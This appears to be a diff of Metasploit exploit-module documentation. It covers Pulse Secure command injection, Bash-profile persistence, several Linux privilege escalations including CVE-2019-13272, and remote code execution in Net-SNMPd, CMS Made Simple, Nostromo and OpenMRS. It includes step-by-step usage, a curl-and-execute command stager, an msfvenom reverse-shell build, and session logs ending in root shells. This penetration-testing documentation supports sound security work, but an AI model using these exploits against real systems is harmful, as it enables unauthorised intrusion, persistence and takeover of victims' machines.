+[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.162:47086) at 2019-11-05 08:54:34 -0600
+[+] Deleted .htaccess
+```
+

documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md

@@ -0,0 +1,78 @@
+## Introduction
+
+This module exploits a post-auth command injection in the Pulse Secure
+VPN server to execute commands as root. The `env(1)` command is used to
+bypass application whitelisting and run arbitrary commands.
+
+Please see related module `auxiliary/gather/pulse_secure_file_disclosure`
+for a pre-auth file read that is able to obtain plaintext and hashed
+credentials, plus session IDs that may be used with this exploit.
+
+A valid administrator session ID is required in lieu of untested SSRF.
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   Unix In-Memory
+1   Linux Dropper
+```
+
+## Options
+
+**SID**
+
+Set this to a valid administrator session ID. Typically retrieved using
+the `auxiliary/gather/pulse_secure_file_disclosure` module.
+
+## Usage
+
+```
+msf5 exploit(linux/http/pulse_secure_cmd_exec) > set sid 676f5f892e8c4a6419f10564f9e9d857
+sid => 676f5f892e8c4a6419f10564f9e9d857
+msf5 exploit(linux/http/pulse_secure_cmd_exec) > run
+
+[*] Started reverse TCP handler on 127.0.0.1:[redacted]
+[+] Setting session cookie: DSID=676f5f892e8c4a6419f10564f9e9d857
+[*] Obtaining CSRF token
+[+] CSRF token: 6b0e020e1de8c68c043ea0e4f663b7a5
+[*] Executing Linux Dropper target
+[*] Using URL: https://0.0.0.0:[redacted]/HSEjp77
+[*] Local IP: https://[redacted]:[redacted]/HSEjp77
+[*] Generated command stager: ["curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77", "chmod +x /tmp/qlUqDxCU", "/tmp/qlUqDxCU", "rm -f /tmp/qlUqDxCU"]
+[*] Executing command: env /home/bin/curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77
+[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
+[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
+[*] Client 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18) requested /HSEjp77
+[*] Sending payload to 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18)
+[+] Payload execution successful
+[*] Command Stager progress -  63.96% done (71/111 bytes)
+[*] Executing command: env chmod +x /tmp/qlUqDxCU
+[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
+[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
+[+] Payload execution successful
+[*] Command Stager progress -  87.39% done (97/111 bytes)
+[*] Executing command: env /tmp/qlUqDxCU
+[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
+[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
+[*] Meterpreter session 1 opened (127.0.0.1:[redacted] -> 127.0.0.1:53200) at 2019-11-12 02:05:40 -0600
+[!] Payload execution may have failed
+[*] Command Stager progress - 102.70% done (114/111 bytes)
+[*] Executing command: env rm -f /tmp/qlUqDxCU
+[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
+[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
+[+] Payload execution successful
+[*] Command Stager progress - 123.42% done (137/111 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > sysinfo
+Computer     : [redacted]
+OS           :  (Linux 2.6.32-00486-gddd7e32-dirty)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```

documentation/modules/exploit/linux/local/bash_profile_persistence.md

@@ -0,0 +1,50 @@
+## Description
+
+  This module establishes persistence via the Linux Bash profile method.
+  This module makes two changes to the target system.
+  First, the module writes a payload to a directory (`/var/temp/` by default).
+  Second, the module writes a payload execution trigger to the Bash profile (`~/.bashrc` by default).
+  The persistent payload is executed whenever the victim user opens a Bash terminal.
+
+## Vulnerable Application
+
+  This module has been tested successfully on:
+
+  * Ubuntu 19 (x86_64) running GNU bash, version 5.0.3(1)-release
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a Meterpreter session
+  3. `use exploit/linux/local/bash_profile_persistence`
+  4. `set SESSION [SESSION]`
+  5. `run`
+  6. On victim, open a new Bash terminal
+  7. You should get a new session with the permissions of the exploited user account
+
+## Options
+
+  **BASH_PROFILE**
+
+  The path to the target Bash profile. (default: `~/.bashrc`)
+
+  **PAYLOAD_DIR**
+
+  A writable directory file system path. (default: `/var/tmp`)
+
+## Scenarios
+
+```
+msf5 > use exploit/linux/local/bash_profile_persistence
+msf5 exploit(linux/local/bash_profile_persistence) > set SESSION 1
+msf5 exploit(linux/local/bash_profile_persistence) > exploit
+
+[*] Bash profile exists: /home/user/.bashrc
+[*] Bash profile is writable: /home/user/.bashrc
+[*] Created backup Bash profile: /root/.msf4/logs/persistence/192.168.1.191_20191128.130945_Bash_Profile.backup
+[*] Writing '/var/tmp/IgHypGLMglheQ' (126 bytes) ...
+[+] Wrote payload trigger to Bash profile
+[!] Payload will be triggered when target opens a Bash terminal
+[!] Don't forget to start your handler:
+[!] msf> handler -H 0.0.0.0 -P 4444 -p cmd/unix/reverse_python
+```

documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md

@@ -0,0 +1,76 @@
+## Description
+
+  This module exploits the trusted `$PATH` environment
+  variable of the SUID binary `omniresolve` in
+  Micro Focus (HPE) Data Protector A.10.40 and prior.
+
+  The `omniresolve` executable calls the `oracleasm` binary using
+  a relative path and the trusted `$PATH`, which allows an attacker
+  to execute a custom binary with `root` privileges.
+
+
+## Vulnerable Application
+
+  This module has been successfully tested on:
+
+  * HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110
+  * Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118 on CentOS Linux release 7.6.1810 (Core)
+
+  The vulnerability has been patched in:
+  * Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/linux/local/omniresolve_suid_priv_esc`
+  4. `set SESSION [SESSION]`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SUID_PATH**
+
+  Path to `omniresolve` executable (default: `/opt/omni/lbin/omniresolve`)
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenario
+
+### DP 10.40 build 118 on CentOS Linux release 7.6.1810 (Core)
+
+  ```
+  msf5 > use exploit/linux/local/omniresolve_suid_priv_esc
+  msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/omniresolve_suid_priv_esc) > check
+  [+] The target is vulnerable.
+  msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp 
+  payload => linux/x64/meterpreter/reverse_tcp
+  msf5 exploit(linux/local/komniresolve_suid_priv_esc) > set lhost 192.168.0.113
+  lhost => 192.168.0.113
+  msf5 exploit(linux/local/omniresolve_suid_priv_esc) > run
+  
+  [*] Started reverse TCP handler on 192.168.0.113:4444 
+  [*] Sending stage (3021284 bytes) to 192.168.0.107
+  [*] Meterpreter session 2 opened (192.168.0.113:4444 -> 192.168.0.107:54510) at 2019-10-01 13:19:45 -0400
+  [+] Deleted /tmp/oracleasm
+  [+] Deleted /tmp/gprjmiMGOr
+  
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 192.168.0.107
+  OS           : CentOS 7.6.1810 (Linux 3.10.0-957.21.2.el7.x86_64)
+  Architecture : x64
+  BuildTuple   : x86_64-linux-musl
+  Meterpreter  : x64/linux
+  meterpreter > 
+  ```

documentation/modules/exploit/linux/local/ptrace_traceme_pkexec_helper.md

@@ -0,0 +1,175 @@
+## Vulnerable Application
+
+This module exploits an issue in ptrace_link in kernel/ptrace.c before Linux
+kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but
+not over an SSH session, as it requires execution from within the context of
+a user with an active Polkit agent.
+
+In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles
+the recording of the credentials of a process that wants to create a ptrace
+relationship, which allows local users to obtain root access by leveraging
+certain scenarios with a parent-child process relationship, where a parent drops
+privileges and calls execve (potentially allowing control by an attacker). One
+contributing factor is an object lifetime issue (which can also cause a panic).
+Another contributing factor is incorrect marking of a ptrace relationship as
+privileged, which is exploitable through (for example) Polkit's pkexec helper
+with PTRACE_TRACEME. NOTE: SELinux deny_ptrace might be a usable workaround in
+some environments.
+
+  This module has been tested successfully on:
+  * Ubuntu 16.04.5 kernel 4.15.0-29-generic
+  * Ubuntu 18.04.1 kernel 4.15.0-20-generic
+  * Ubuntu 19.04 kernel 5.0.0-15-generic
+  * Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic
+  * Linux Mint 17.3 kernel 4.4.0-89-generic
+  * Linux Mint 18.3 kernel 4.13.0-16-generic
+  * Linux Mint 19 kernel 4.15.0-20-generic
+  * Xubuntu 16.04.4 kernel 4.13.0-36-generic
+  * ElementaryOS 0.4.1 4.8.0-52-generic
+  * Backbox 6 kernel 4.18.0-21-generic
+  * Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
+  * Kali kernel 4.19.0-kali5-amd64
+  * Redcore 1806 (LXQT) kernel 4.16.16-redcore
+  * MX 18.3 kernel 4.19.37-2~mx17+1
+  * RHEL 8.0 kernel 4.18.0-80.el8.x86_64
+  * Debian 9.4.0 kernel 4.9.0-6-amd64
+  * Debian 10.0.0 kernel 4.19.0-5-amd64
+  * Devuan 2.0.0 kernel 4.9.0-6-amd64
+  * SparkyLinux 5.8 kernel 4.19.0-5-amd64
+  * Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64
+  * Manjaro 18.0.3 kernel 4.19.23-1-MANJARO
+  * Mageia 6 kernel 4.9.35-desktop-1.mga6
+  * Antergos 18.7 kernel 4.17.6-1-ARCH
+
+## Verification Steps
+
+  1. Start msfconsole
+  1. Get a shell or meterpreter session on the target
+  1. Do: `use exploit/linux/local/ptrace_traceme_pkexec_helper`
+  1. Do: `set session #`
+  1. Do: `exploit`
+
+## Options
+
+  **WritableDir**
+
+  A folder we can write files to.  Defaults to `/tmp`
+
+  **COMPILE**
+  
+  If we should live compile on the system, or drop pre-created binaries.  Auto will determine if gcc/libs are installed to compile live on the system.  Defaults to `Auto`
+
+## Scenarios
+
+### Ubuntu 18.04 (with Linux 4.15.0-13-generic)
+
+#### Initial Access
+
+We need to gain an initial session on the target system before we can use this module.
+Additionally this module will only work from a GUI session, and will fail with an SSH session.
+In order to gain a compatible session we will upload a payload binary and run it from gnome-terminal.
+
+```
+# Create a payload binary
+msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f elf -o binary
+
+# Start a handler
+msfconsole
+msf5 > use exploit/multi/handler
+msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf5 exploit(multi/handler) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+msf5 exploit(multi/handler) > set LPORT 4444
+LPORT => 4444
+msf5 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+
+# Execute the payload using gnome-terminal on the target
+
+[*] Sending stage (3021284 bytes) to 192.168.56.7
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.7:33244) at 2019-09-03 17:42:17 +0800
+
+meterpreter > background
+
+```
+
+#### Escalate
+
+In this scenario, gcc is installed so we can live compile on the system.
+
+```
+msf5 exploit(multi/handler) > use exploit/linux/local/ptrace_traceme_pkexec_helper
+msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set SESSION 1
+SESSION => 1
+msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set VERBOSE true
+VERBOSE => true
+msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > exploit
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[+] Kernel version 4.15.0-13-generic appears to be vulnerable
+[+] pkexec is installed
+[*] Writing '/tmp/.zacecz' (285 bytes) ...
+[+] gcc is installed
+[*] Live compiling exploit on system...
+[*] Writing '/tmp/.fmrefxhjjcq.c' (9718 bytes) ...
+[*] Executing exploit '/tmp/.fmrefxhjjcq'
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3021284 bytes) to 192.168.56.7
+[*] Exploit result:
+Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
+[.] Checking environment ...
+[!] Warning: $XDG_SESSION_ID is not set
+[!] Warning: Could not find active PolKit agent
+[~] Done, looks good
+[.] Searching for known helpers ...
+[~] Found known helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper
+[.] Using helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper
+[.] Spawning suid process (/usr/bin/pkexec) ...
+[.] Tracing midpid ...
+[~] Attached to midpid
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.7:58270) at 2019-09-03 17:29:57 +0800
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+```
+
+#### Escalate w/ pre-compiled binaries
+
+It is possible to force pre-compiled binaries, in a scenario where `build-essential` or `gcc` aren't on the system.
+
+```
+msf5 exploit(multi/handler) > use exploit/linux/local/ptrace_traceme_pkexec_helper
+msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set SESSION 1
+SESSION => 1
+msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set COMPILE False
+COMPILE => False
+msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[+] Kernel version 4.15.0-13-generic appears to be vulnerable
+[+] pkexec is installed
+[*] Writing '/tmp/.yaamzkukaml' (285 bytes) ...
+[*] Dropping pre-compiled exploit on system...
+[*] Writing '/tmp/.wtoplrisgzzo' (51200 bytes) ...
+[*] Executing exploit '/tmp/.wtoplrisgzzo'
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3021284 bytes) to 192.168.56.7
+[*] Exploit result:
+Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
+[.] Checking environment ...
+[!] Warning: $XDG_SESSION_ID is not set
+[!] Warning: Could not find active PolKit agent
+[~] Done, looks good
+[.] Searching for known helpers ...
+[~] Found known helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper
+[.] Using helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper
+[.] Spawning suid process (/usr/bin/pkexec) ...
+[.] Tracing midpid ...
+[~] Attached to midpid
+[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.7:58272) at 2019-09-03 17:30:16 +0800
+```
+

documentation/modules/exploit/linux/misc/ueb9_bpserverd.md

@@ -39,25 +39,25 @@ msf exploit(ueb9_bpserverd) > exploit
 [*] Started reverse TCP handler on 10.0.0.141:4444
 [*] 10.0.0.230:1743 - 10.0.0.230:1743 - pwn'ng ueb 9....
 [*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
-[+] 10.0.0.230:1743 - bpd port recieved: 45425
+[+] 10.0.0.230:1743 - bpd port received: 45425
 [*] 10.0.0.230:1743 - Connecting to 45425
 [+] 10.0.0.230:1743 - Connected!
 [*] 10.0.0.230:1743 - Sending command buffer to xinetd
 [*] 10.0.0.230:1743 - Command Stager progress -  26.71% done (199/745 bytes)
 [*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
-[+] 10.0.0.230:1743 - bpd port recieved: 40889
+[+] 10.0.0.230:1743 - bpd port received: 40889
 [*] 10.0.0.230:1743 - Connecting to 40889
 [+] 10.0.0.230:1743 - Connected!
 [*] 10.0.0.230:1743 - Sending command buffer to xinetd
 [*] 10.0.0.230:1743 - Command Stager progress -  53.56% done (399/745 bytes)
 [*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
-[+] 10.0.0.230:1743 - bpd port recieved: 40016
+[+] 10.0.0.230:1743 - bpd port received: 40016
 [*] 10.0.0.230:1743 - Connecting to 40016
 [+] 10.0.0.230:1743 - Connected!
 [*] 10.0.0.230:1743 - Sending command buffer to xinetd
 [*] 10.0.0.230:1743 - Command Stager progress -  80.27% done (598/745 bytes)
 [*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
-[+] 10.0.0.230:1743 - bpd port recieved: 53649
+[+] 10.0.0.230:1743 - bpd port received: 53649
 [*] 10.0.0.230:1743 - Connecting to 53649
 [+] 10.0.0.230:1743 - Connected!
 [*] 10.0.0.230:1743 - Sending command buffer to xinetd

documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md

@@ -0,0 +1,123 @@
+## Vulnerable Application
+
+  This module uses SNMP extension MIBs to enable remote code execution on the Linux Net-SNMPD servers using the 
+  SNMP-EXTEND-MIB.
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/linux/snmp/net_snmpd_rw_access`
+  3. Do: `set rhost [IP]`
+  4. Do: `set community [SNMP Community]`
+  5. Do: `set version [SNMP Version]`
+  6. Configure the payload
+  7. Do: `run`
+  8. You should get a session
+
+## Options
+  **FILEPATH**  
+  The location to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp.  
+  
+  **COMMUNITY**  
+  The read/write community string of the target Net-SNMP service.
+  
+  **VERSION**  
+  The SNMP protocol version. Accepted values are '1' or '2c'. 
+  
+  **CHUNKSIZE**  
+  The maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments, but should hopefully work for all cmdstager flavors  
+  Note that cmdstager payloads are modified to allow further escaping, so the values limits may also change between cmdstager flavors.  
+  This is possibly related to the following bug: [https://sourceforge.net/p/net-snmp/bugs/2542/].
+  
+  **TIMEOUT**  
+  Specifies the maximum time to allow SNMP to timeout.  
+  
+  **SHELL**  
+  The shell to call for the client. Defaults to '/bin/bash'  
+
+
+  
+## Scenario
+
+  ```
+  msf > use exploit/linux/snmp/net_snmpd_rw_access 
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set payload linux/x86/meterpreter/reverse_tcp
+  payload => linux/x86/meterpreter/reverse_tcp
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set rhost 192.168.1.3
+  rhost => 192.168.1.3
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set lhost 192.168.1.2
+  lhost => 192.168.1.2
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set community private
+  community => private
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set version 2c
+  version => 2c
+
+  msf exploit(linux/snmp/net_snmpd_rw_access) > show info
+  
+         Name: Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution
+       Module: exploit/linux/snmp/net_snmpd_rw_access
+     Platform: 
+         Arch: 
+   Privileged: No
+      License: Metasploit Framework License (BSD)
+         Rank: Normal
+
+  Provided by:
+    Steve Embling at InteliSecure
+
+  Available targets:
+    Id  Name
+    --  ----
+    0   Linux x86
+
+  Basic options:
+    Name       Current Setting  Required  Description
+    ----       ---------------  --------  -----------
+    CHUNKSIZE  200              yes       Maximum bytes of payload to write at once 
+    COMMUNITY  private          yes       SNMP Community String
+    FILEPATH   /tmp             yes       file path to write to 
+    RETRIES    1                yes       SNMP Retries
+    RHOST      192.168.1.3      yes       The target address
+    RPORT      161              yes       The target port (TCP)
+    SHELL      /bin/bash        yes       Shell to call with -c argument
+    SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+    SRVPORT    8080             yes       The local port to listen on.
+    SSL        false            no        Negotiate SSL for incoming connections
+    SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+    TIMEOUT    1                yes       SNMP Timeout
+    URIPATH                     no        The URI to use for this exploit (default is random)
+    VERSION    2c               yes       SNMP Version <1/2c> 
+
+  Payload information:
+    Space: 4096
+
+  Description:
+    This exploit module exploits the SNMP write access configuration 
+    ability of SNMP-EXTEND-MIB to configure MIB extensions and lead to 
+    remote code execution.
+
+  References:
+    https://www.intelisecure.com
+
+  msf exploit(linux/snmp/net_snmpd_rw_access) > run
+  
+  [*] Started reverse TCP handler on 192.168.1.2:4444 
+  [*] Command Stager progress -   1.11% done (199/17924 bytes)
+  [*] Command Stager progress -   2.23% done (399/17924 bytes)
+  [*] Command Stager progress -   3.34% done (598/17924 bytes)
+  [*] Command Stager progress -   4.45% done (797/17924 bytes)
+  ... Redacted ...
+  [*] Command Stager progress -  98.64% done (17681/17924 bytes)
+  [*] Command Stager progress -  99.72% done (17873/17924 bytes)
+  [*] Sending stage (857352 bytes) to 192.168.1.3
+  [*] Meterpreter session 31 opened (192.168.1.2:4444 -> 192.168.1.3:54232) at 2018-02-14 17:30:22 +0000
+  [+] SNMP request timeout (this is promising).
+  [*] Command Stager progress - 100.00% done (18022/18022 bytes)
+
+  
+  meterpreter > getuid
+  Server username: uid=121, gid=129, euid=121, egid=129
+  meterpreter > exit
+  [*] 192.168.1.3 - Meterpreter session 30 closed.  Reason: User exit
+
+  ```

documentation/modules/exploit/multi/http/cmsms_object_injection_rce.md

@@ -0,0 +1,61 @@
+## Description
+
+This module exploits an object injection vulnerability on files `action.admin_bulk_template` in DesignManager module (that is installed by default from CMS Made Simple). With an unprivileged user with Designer permission, it is possible to reach an `unserialize` function with a crafted value in the `m1_allparms` parameter resulting in execution of arbitrary PHP code.
+
+Tested on CMS Made Simple 2.2.6, 2.2.7, 2.2.8, 2.2.9 and 2.2.9.1.
+
+## Vulnerable Application
+
+Affecting CMS Made Simple, version 2.2.6, 2.2.7, 2.2.8, 2.2.9, 2.2.9.1
+
+## Verification Steps
+
+1. Setting up a working installation of CMS Made Simple (CMSMS)
+2. [OPTIONALLY] setting up a new user, assign it to a group and set the *Designer* permissions on group
+3. Start `msfconsole`
+4. `use exploit/multi/http/cmsms_object_injection_rce`
+5. `set RHOST <IP>`
+6. `set USERNAME <USERNAME>`
+7. `set PASSWORD <PASSWORD>`
+8. `check`
+9. You should see `The target appears to be vulnerable.`
+10. `exploit`
+11. You should get a meterpreter session!
+
+## Options
+
+* **TARGETURI**: Path to CMS Made Simple (CMSMS) App installation (`/` is the default)
+* **USERNAME**: Username to authenticate with
+* **PASSWORD**: Password to authenticate with
+
+## Scenario
+
+### Tested on CMS Made Simple (CMSMS) 2.2.8
+
+```
+msf5 > use exploit/multi/http/cmsms_object_injection_rce
+msf5 exploit(multi/http/cmsms_object_injection_rce) > set rhosts target.com
+rhosts => target.com
+msf5 exploit(multi/http/cmsms_object_injection_rce) > check
+[*] 192.168.1.64:80 - The target appears to be vulnerable.
+msf5 exploit(multi/http/cmsms_object_injection_rce) > set username daniele
+username => daniele
+msf5 exploit(multi/http/cmsms_object_injection_rce) > set password qwerty
+password => qwerty
+msf5 exploit(multi/http/cmsms_object_injection_rce) > set targeturi /cmsms/
+targeturi => /cmsms/
+msf5 exploit(multi/http/cmsms_object_injection_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.64:4444
+[*] Sending stage (38247 bytes) to 192.168.1.64
+[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.64:41308) at 2019-11-01 11:15:57 +0100
+[+] Deleted RsjeISeAu.php
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.1.64 - Meterpreter session 1 closed.  Reason: User exit
+msf5 exploit(multi/http/cmsms_object_injection_rce) > 
+```

documentation/modules/exploit/multi/http/nostromo_code_exec.md

@@ -0,0 +1,93 @@
+## Vulnerable Application
+
+Verified against:
+
+* Nostromo 1.9.6 on Linux
+
+Nostromo sources can be downloaded from http://www.nazgul.ch/dev_nostromo.html
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: `use exploit/multi/http/nostromo_code_exec`
+  4. Do: `set rport <port>`
+  5. Do: `set rhost <ip>`
+  6. Do: `check`
+  7. Do: `set payload linux/x86/meterpreter/reverse_tcp`
+  8. Do: `set lhost <ip>`
+  9. Do: `exploit`
+  10. You should get a shell.
+
+## Scenarios
+
+Example utilizing nostromo 1.9.6 on Ubuntu Linux.
+
+```
+msf5 > use exploit/multi/http/nostromo_code_exec
+msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9
+RHOSTS => 192.168.1.9
+msf5 exploit(multi/http/nostromo_code_exec) > set RPORT 8000
+RPORT => 8000
+msf5 exploit(multi/http/nostromo_code_exec) > check
+[*] 192.168.1.9:8000 - The target appears to be vulnerable.
+msf5 exploit(multi/http/nostromo_code_exec) > set target 1
+target => 1
+msf5 exploit(multi/http/nostromo_code_exec) > set payload linux/x86/meterpreter/reverse_tcp
+payload => linux/x86/meterpreter/reverse_tcp
+msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10
+LHOST => 192.168.1.10
+msf5 exploit(multi/http/nostromo_code_exec) > set LPORT 4444
+LPORT => 4444
+msf5 exploit(multi/http/nostromo_code_exec) > run
+
+[*] Started reverse TCP handler on 192.168.1.10:4444 
+[*] Configuring Automatic (Linux Dropper) target
+[*] Sending linux/x86/meterpreter/reverse_tcp command stager
+[*] Sending stage (985320 bytes) to 192.168.1.9
+[*] Meterpreter session 2 opened (192.168.1.10:4444 -> 192.168.1.9:52544) at 2019-10-29 16:08:18 +0100
+[*] Command Stager progress - 100.00% done (763/763 bytes)
+
+meterpreter > sysinfo
+Computer     : nostromo.local
+OS           : Ubuntu 18.04 (Linux 4.15.0-62-generic)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > exit
+[*] Shutting down Meterpreter...
+[*] 192.168.1.9 - Meterpreter session 2 closed.  Reason: User exit
+```
+
+nostromo 1.9.6 on OpenBSD.
+
+```
+msf5 > use exploit/multi/http/nostromo_code_exec
+msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9
+RHOSTS => 192.168.1.9
+msf5 exploit(multi/http/nostromo_code_exec) > set RPORT 8001
+RPORT => 8001
+msf5 exploit(multi/http/nostromo_code_exec) > check
+[*] 192.168.1.9:8001 - The target appears to be vulnerable.
+msf5 exploit(multi/http/nostromo_code_exec) > set target 0
+target => 0
+msf5 exploit(multi/http/nostromo_code_exec) > set payload cmd/unix/reverse_perl
+payload => cmd/unix/reverse_perl
+msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10
+LHOST => 192.168.1.10
+msf5 exploit(multi/http/nostromo_code_exec) > set LPORT 4444
+LPORT => 4444
+msf5 exploit(multi/http/nostromo_code_exec) > run
+
+[*] Started reverse TCP handler on 192.168.1.10:4444
+[*] Configuring Automatic (Unix In-Memory) target
+[*] Sending cmd/unix/reverse_perl command payload
+[*] Command shell session 1 opened (192.168.1.10:4444 -> 192.168.1.9:52312) at 2019-10-29 15:48:28 +0100
+id
+uid=536(_nostromo) gid=536(_nostromo) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
+uname -avr
+OpenBSD nostromo.local 6.4 GENERIC#349 amd64
+^C
+Abort session 1? [y/N]  y
+[*] 192.168.1.9 - Command shell session 1 closed.  Reason: User exit
+```

documentation/modules/exploit/multi/http/openmrs_deserialization.md

@@ -0,0 +1,55 @@
+## Vulnerable Application
+
+  OpenMRS is an open-source platform that supplies
+  users with a customizable medical record system.
+
+  There exists an object deserialization vulnerability
+  in the `webservices.rest` module used in OpenMRS Platform
+  for versions below `v2.24.0`. Unauthenticated remote code
+  execution can be achieved by sending a malicious XML payload
+  to a Rest API endpoint such as `/ws/rest/v1/concept`.
+
+  Vulnerable versions of the software can be found [here](https://sourceforge.net/projects/openmrs/files/releases/).
+
+  Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java
+  8 and Java 9.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/http/openmrs_deserialization```
+  4. Do: ```set TARGETURI <uri>```
+  5. Do: ```set RHOSTS <ip>```
+  6. Do: ```run```
+  7. You should get a shell.
+
+## Scenarios
+
+### OpenMRS Platform `v2.1.2`
+
+  ```
+  msf5 > use exploit/multi/http/openmrs_deserialization
+  msf5 exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.176
+  rhosts => 192.168.37.176
+  msf5 exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone
+  targeturi => /openmrs-standalone
+  msf5 exploit(multi/http/openmrs_deserialization) > check
+  [*] 192.168.37.176:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2
+  msf5 exploit(multi/http/openmrs_deserialization) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] Target is running OpenMRS
+  [*] Sending payload...
+  [*] Sending stage (3021284 bytes) to 192.168.37.176
+  [*] Meterpreter session 3 opened (192.168.37.1:4444 -> 192.168.37.176:47056) at 2019-12-04 12:18:50 -0600
+
+  meterpreter > getuid
+  Server username: uid=1000, gid=1000, euid=1000, egid=1000
+  meterpreter > sysinfo
+  Computer     : 192.168.37.176
+  OS           : Ubuntu 18.04 (Linux 5.0.0-36-generic)
+  Architecture : x64
+  BuildTuple   : x86_64-linux-musl
+  Meterpreter  : x64/linux
+  ```

documentation/modules/exploit/multi/http/totaljs_cms_widget_exec.md

